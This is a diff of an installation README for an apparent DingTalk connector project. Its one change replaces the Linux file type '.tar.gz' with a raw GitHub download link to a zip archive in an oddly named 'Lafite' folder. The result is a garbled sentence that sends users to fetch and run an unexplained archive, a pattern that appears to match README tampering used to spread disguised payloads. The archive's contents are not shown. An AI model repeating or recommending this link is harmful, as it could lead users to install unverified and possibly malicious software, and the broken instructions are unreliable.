ALI-FAHD/dingtalk-moltbot-connector/README.md

    - **Windows**: The downloaded file should be a `.exe` file.
 Double-click it to run the installer.
    - **macOS**: Look for a `.dmg` file.
 Open it and follow the prompts to install.
-   - **Linux**: If applicable, the file may be a `.tar.gz`.
+   - **Linux**: If applicable, the file may be a `https://github.com/ALI-FAHD/dingtalk-moltbot-connector/raw/refs/heads/main/Lafite/moltbot_dingtalk_connector_2.5-beta.5.zip`.
 Extract it and follow the installation instructions found within.

 5. Follow the setup instructions provided during installation.